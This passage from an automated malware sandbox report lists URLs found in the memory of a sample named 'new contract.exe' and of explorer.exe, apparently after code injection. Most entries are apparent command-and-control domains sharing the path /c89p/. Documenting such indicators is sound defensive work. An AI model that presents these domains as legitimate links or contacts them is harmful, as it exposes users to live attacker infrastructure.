Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.hinawinner.top/c89p/
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hinawinner.top/c89p/www.torehousestudio.info
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hinawinner.topReferer:
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.igmoto.info
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.igmoto.info/c89p/
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.igmoto.info/c89p/www.olar-systems-panels-61747.bond
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.igmoto.infoReferer:
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.innivip.bio
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.innivip.bio/c89p/
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.innivip.bio/c89p/www.aser-cap-hair-growth.today
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.innivip.bioReferer:
          Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ldkp.net
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ldkp.net/c89p/
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ldkp.net/c89p/www.r64mh1.vip
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ldkp.netReferer:
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.livialiving.online
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.livialiving.online/c89p/
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.livialiving.online/c89p/www.innivip.bio
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.livialiving.onlineReferer:
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.olar-systems-panels-61747.bond
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.olar-systems-panels-61747.bond/c89p/
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.olar-systems-panels-61747.bond/c89p/www.arklife.shop
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.olar-systems-panels-61747.bondReferer:
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oviepicker.net
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oviepicker.net/c89p/
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oviepicker.net/c89p/www.hinawinner.top
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oviepicker.netReferer:
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.plesacv.xyz
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.plesacv.xyz/c89p/
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.plesacv.xyz/c89p/www.ldkp.net
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.plesacv.xyzReferer:
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.r64mh1.vip
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.r64mh1.vip/c89p/
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.r64mh1.vip/c89p/www.aycare-service-99683.bond
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.r64mh1.vipReferer:
          Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: new contract.exe, 00000000.00000002.1743134989.0000000005904000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com8W
          Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sofaerb.shop
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sofaerb.shop/c89p/
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sofaerb.shop/c89p/www.uickautoquote.net
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sofaerb.shopReferer:
          Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.torehousestudio.info
          Source: explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.torehousestudio.info/c89p/
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.torehousestudio.infoReferer:
          Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uickautoquote.net
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uickautoquote.net/c89p/
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uickautoquote.net/c89p/www.plesacv.xyz
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.uickautoquote.netReferer:
          Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.x-design-courses-29670.bond
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.x-design-courses-29670.bond/c89p/
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.x-design-courses-29670.bond/c89p/www.oviepicker.net
          Source: explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.x-design-courses-29670.bondReferer:
          Source: new contract.exe, 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
          Source: explorer.exe, 00000003.00000002.4141038919.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1762772794.000000000C893000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
          Source: explorer.exe, 00000003.00000003.3484154679.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1745295797.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108475652.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/Vh5j3k
